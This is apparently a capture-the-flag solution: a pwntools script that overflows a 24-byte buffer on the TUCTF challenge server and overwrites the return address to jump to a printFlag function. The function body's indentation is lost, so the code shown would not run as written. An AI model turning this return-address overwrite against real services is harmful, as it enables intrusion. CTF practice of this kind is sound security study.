Rating: 4.0

```python
from pwn import *
context.log_level = "DEBUG"

def run():
#s = process('thefirst')
s = remote("chal.tuctf.com",30508)
junk = "A" * (24)
s.recvline()

payload = junk.encode()
payload += p32(0x080491f6) #printFlag address
s.sendline(payload)
res = s.recvline()
print(res)

run()
```